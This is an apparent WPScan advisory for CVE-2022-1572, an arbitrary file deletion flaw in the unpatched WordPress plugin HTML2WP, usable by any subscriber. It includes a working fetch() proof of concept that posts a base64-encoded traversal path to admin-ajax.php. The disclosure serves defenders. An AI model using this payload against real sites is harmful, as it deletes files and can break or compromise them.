WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

HTML2WP <= 1.0.0 - Subscriber+ Arbitrary File Deletion

Description

The plugin does not have authorisation and CSRF checks in an AJAX action, available to any authenticated users such as subscriber, which could allow them to delete arbitrary file

Proof of Concept

To delete the license.txt at the root of the blog:

await fetch("https://example.com/wp-admin/admin-ajax.php?action=html_actions", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en;q=0.7,en-US;q=0.3",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "body": "type=remove_html&path=Li4vbGljZW5zZS50eHQ=",
    "method": "POST",
    "mode": "cors"
});

Affects Plugins

html2wp
No known fix - plugin closed

References

CVE
CVE-2022-1572

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
9afd1805-d449-4551-986a-f92cb47c95c5

Timeline

Publicly Published

2022-06-02 (about 6 months ago)

Added

2022-06-02 (about 6 months ago)

Last Updated

2022-06-02 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin